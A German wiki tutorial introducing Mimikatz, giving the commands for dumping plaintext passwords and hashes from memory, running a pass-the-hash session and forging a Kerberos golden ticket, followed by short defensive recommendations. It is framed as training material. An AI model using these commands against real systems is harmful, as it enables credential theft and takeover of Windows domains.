Mimikatz

Aus Xinux Wiki
Version vom 15. August 2024, 20:03 Uhr von Thomas.will (Diskussion | Beiträge)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

Ziel der Einführung

Ziel dieser Einführung ist es, die grundlegende Funktionsweise von Mimikatz zu verstehen und verschiedene sicherheitsrelevante Aufgaben durchzuführen, wie das Extrahieren von Klartext-Passwörtern, das Ausführen von Pass-the-Hash-Angriffen und das Erhöhen von Rechten. Diese Einführung dient ausschließlich zu Schulungszwecken und zur Sensibilisierung für Sicherheitslücken.

Voraussetzungen

  • Ein Windows-Rechner oder eine virtuelle Maschine.
  • Administratorrechte auf dem Zielsystem.
  • Die Mimikatz-Binärdatei, die heruntergeladen und entpackt wurde.

Schritt-für-Schritt-Anleitung

1. Vorbereitung und Installation

  • **Mimikatz herunterladen:**
 * Besuchen Sie das offizielle GitHub-Repository von Mimikatz: [1](https://github.com/gentilkiwi/mimikatz).
 * Laden Sie die neueste Version von Mimikatz herunter und entpacken Sie die ZIP-Datei an einem zugänglichen Ort auf Ihrem System.

Eingabeaufforderung als Administrator öffnen:** 

 * Klicken Sie mit der rechten Maustaste auf das Startmenü und wählen Sie **"Eingabeaufforderung (Administrator)"** oder **"Windows PowerShell (Administrator)"**, um ein Konsolenfenster mit Administratorrechten zu öffnen.
  • **Mimikatz starten:**
 * Navigieren Sie in der Eingabeaufforderung zu dem Verzeichnis, in dem Sie Mimikatz entpackt haben.
 * Starten Sie Mimikatz, indem Sie den folgenden Befehl eingeben:

```plaintext mimikatz.exe

2. Privilegien erhöhen

Debug-Rechte aktivieren: Um viele Mimikatz-Befehle ausführen zu können, müssen Debug-Rechte aktiviert werden. Geben Sie den folgenden Befehl ein: plaintext Code kopieren privilege::debug Wenn der Befehl erfolgreich ist, wird eine Bestätigung angezeigt, dass die Debug-Rechte gewährt wurden.

3. Klartext-Passwörter extrahieren

Passwörter im Klartext anzeigen: Um die im Speicher befindlichen Passwörter zu extrahieren, verwenden Sie den folgenden Befehl: plaintext Code kopieren sekurlsa::logonpasswords Mimikatz zeigt eine Liste der aktuell im Speicher befindlichen Anmeldeinformationen an, einschließlich Klartext-Passwörter, NTLM-Hashes und Kerberos-Tickets.

4. Pass-the-Hash-Angriff durchführen

Pass-the-Hash vorbereiten:

Notieren Sie sich den NTLM-Hash eines Benutzerkontos, das Sie verwenden möchten. Pass-the-Hash ausführen:

Verwenden Sie den folgenden Befehl, um eine neue Sitzung mit dem gestohlenen Hash zu erstellen: plaintext Code kopieren sekurlsa::pth /user:BENUTZERNAME /domain:DOMAENE /ntlm:NTLM-HASH /run:cmd.exe Ersetzen Sie BENUTZERNAME, DOMAENE und NTLM-HASH durch die entsprechenden Werte. Dieser Befehl startet eine neue Eingabeaufforderung mit den Berechtigungen des angegebenen Benutzerkontos.

5. Golden Ticket erstellen (Kerberos)

Kerberos-Ticket erstellen: Um ein "Golden Ticket" zu erstellen, das vollen Zugriff auf ein Active Directory ermöglicht, verwenden Sie den folgenden Befehl: plaintext Code kopieren kerberos::golden /user:BENUTZERNAME /domain:DOMAENE /sid:SID /krbtgt:KRBTGT-HASH /id:500 SID und KRBTGT-HASH müssen vorher extrahiert werden, z.B. durch die Nutzung anderer Mimikatz-Befehle. id:500 bezieht sich auf das Administrator-Konto.

6. Beenden von Mimikatz

Mimikatz sicher beenden: Nachdem Sie Ihre Aufgaben abgeschlossen haben, können Sie Mimikatz beenden, indem Sie den Befehl exit eingeben: plaintext Code kopieren exit Schließen Sie das Konsolenfenster.

Schutzmaßnahmen und Empfehlungen

Regelmäßige Sicherheitsüberprüfungen: Implementieren Sie regelmäßige Überprüfungen von Systemen, um sicherzustellen, dass keine unautorisierten Tools wie Mimikatz verwendet werden. Strenge Zugangskontrollen: Beschränken Sie den Zugriff auf Administratorrechte und stellen Sie sicher, dass nur autorisierte Benutzer über erweiterte Rechte verfügen. Schutz von Speicher und Prozessen: Verwenden Sie Sicherheitslösungen, die den Zugriff auf den Speicher und Prozesse einschränken, um die Ausführung von Tools wie Mimikatz zu verhindern.

Abgerufen von „http://wiki.ixheim.de/index.php?title=Mimikatz&oldid=55563